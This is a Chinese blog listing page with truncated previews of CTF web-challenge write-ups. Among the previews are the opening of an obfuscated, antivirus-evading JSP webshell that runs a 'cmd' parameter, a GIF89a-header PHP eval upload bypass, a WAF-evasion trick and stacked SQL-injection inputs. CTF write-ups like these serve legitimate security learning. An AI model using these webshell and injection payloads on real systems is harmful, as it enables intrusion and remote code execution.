自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(13)
  • 收藏
  • 关注

原创 huaiweictf 部分 web

webWEBSHELL_1免杀shell<%@ page contentType="text/html;charset=UTF-8" language="java" %><% if(request.getParameter("cmd")!=null){ Class rt = Class.forName(new String(new byte[] { 106, 97, 118, 97, 46, 108, 97, 110, 103, 46, 82, 117,

2020-12-22 15:42:55 438 1

原创 [2020hxb] 部分wp

webweb1 题目名字不重要反正题挺简单的就在phpinfo里面 。。。。源码放一下 感觉200分没这么好拿的样子,可能有别的解法。<?phperror_reporting(0);//I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker.if ( isset($_GET['file']) ) { $file = $_GET['file'];

2020-11-03 15:14:07 362

原创 2020CISCN 西南赛区 部分web

就做了两道题,一天做一道,一道坐一天。 @(huaji_han)简单的web题目发现有源码泄漏 www.rar有发现有key.php,里面发现有个shell<?php class XJNU{ private function flag(){ echo $flag; } } if(preg_match("/system|exec|eval|shell_exec|passthru|phpinfo/i" , $_GET['f'])){ die("do not attack

2020-10-05 19:16:15 414

原创 2020重庆市教育局网络安全攻防比赛

crypto1密文Jxyi yi oekh tqo.Jxyi yi oekh suburhqjyed., qdt jxu vbqw yi vv97v97t5t1ss32t9q5u62s2uu1t2v2s, ikrcyj myjx vbqw qdt {}该题是替换密码直接用在线网站爆破https://quipqiup.com/多确定两个完整的单词后 结果就出来了明文This is your day.This is your celebration., and the flag is ff9

2020-09-15 23:49:47 4201 5

原创 WMCTF2020

webweb_checkin源码<?php//PHP 7.0.33 Apache/2.4.25error_reporting(0);$sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']);@mkdir($sandbox);@chdir($sandbox);highlight_file(__FILE__);if(isset($_GET['content'])) { $content = $_GET['content

2020-08-14 20:59:36 1045

原创 DASCTF2020 7月月赛

bullshit题目from flag import flagdef pairing(a,b): shell = max(a, b) step = min(a, b) if step == b: flag = 0 else: flag = 1 return shell ** 2 + step * 2 + flagdef encrypt(message): res = '' for i in range(0,le

2020-07-25 19:27:35 736

原创 BUUCTF [SUCTF 2019]CheckIn

拿到题进行简单的测试,发现修改content-type和利用特殊扩展名php5、pht等都没有成功发现添加图片头文件就可以绕过GIF89a上传php文件的时候发现过滤了<?绕过检测<script language='php'></script>构造图片马GIF89a<script language='php'>eval($_GET['...

2020-02-07 19:51:54 1588

原创 BUUTCTF [RoarCTF 2019]Easy Calc

查看一下源码发现计算的时候请求了一个calc.php发现过滤了一些特殊字符直接传num=phpinfo() ,发现请求失败,应该是被防火墙过滤掉利用php的解析特性,绕过防火墙检测。因为php解析GET POST请求的时候会自动过滤掉空格,而防火墙不会。如:num=phpinfo()%20num=phpinfo()在php解析的时候就是一个东西,防火墙则会当成两个变量成...

2020-01-19 14:34:09 1026 1

原创 BUUCTF [强网杯 2019]高明的黑客

根据提示在url/www.tar.gz拿到源码随便打开几个看看有很多shell 不过都是些不能用的 由于文件太多还是些脚本跑吧 (python3)import osimport reimport requestsfrom multiprocessing import PoolfilePath = "E:\phpstudy_pro\WWW\src"url = "http://1...

2020-01-14 19:16:17 1086

原创 BUUCTF [HCTF 2018]admin

第一步打开网址,就一个欢迎界面 旁边下拉菜单有个登录和注册界面查看一下源码有个注释 应该是提示我们用admin账号登录先随便注册一个账号看看登录成功后有三个界面随便看了看 先去登录注册页面试试有什么注入没有在注册界面试了一下约束攻击,密码随便输了一个123 — 这时的我还不明白事情的严重性报错了 ,好像没行。不过这界面还能运行python可以看见一些东西 ,感觉...

2020-01-11 15:59:43 1081 2

原创 BUUCTF [SUCTF 2019]EasySQL

打开界面试了一下有三种显示还有一个没有输出可以堆叠注入1;show databases; 1;show tables; 可以看到有一个Flag表测试发现from flag都被过滤不能直接读到flag想了很久想不到 看别人wp了~看见听说比赛的时候原理泄漏了的select $_GET['query'] || flag from flag是这样 md 谁想的到啊 别...

2020-01-10 21:39:25 7501 2

原创 BUUCTF [强网杯 2019]随便注

打开题目看见一个输入框输入’报错 应该是有sql注入了使用 1’ # 正确显示直接上 order by1' order by 3 #测试1,2正常,3报错此时天真的我以为我已经离成功不远了~~启动联合查询-1' union select 1,2 #提交继续...

2020-01-09 22:11:37 1084

原创 BUUCTF [HCTF 2018] WarmUp

开局一张图 直接查看源码发现注释source.php访问获得源码<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"s...

2020-01-08 19:39:43 556

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除